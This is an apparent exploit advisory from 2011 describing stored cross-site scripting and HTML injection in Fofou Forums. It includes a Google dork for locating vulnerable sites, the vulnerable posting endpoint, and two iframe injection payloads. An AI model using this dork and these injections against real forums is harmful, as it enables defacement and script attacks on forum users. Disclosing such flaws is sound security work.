Fofou Forums suffers from a cross site scripting vulnerability.
10f95f003804d2af55b19b2c8facc4ee4670b4210299658c881cf02ca1c472dc
# Exploit Title: Permanent XSS and Html Code Injection in the Fofou Forums
# Google Dork: intext:Powered by fofou
# Date: 15.08.2011
# Author: Sony
# Software Link: http://blog.kowalczyk.info/software/fofou/index.html
# Version: all version
..............................
.......................................................................
http://www.server/forum/post
New Topic: (all fields)
XSS: <iframe src="http://xssed.com">
Html Code Injection : <iframe width="425" height="349" src="
http://www.youtube.com/embed/8SaeEQWkVJ0" frameborder="0"
allowfullscreen></iframe>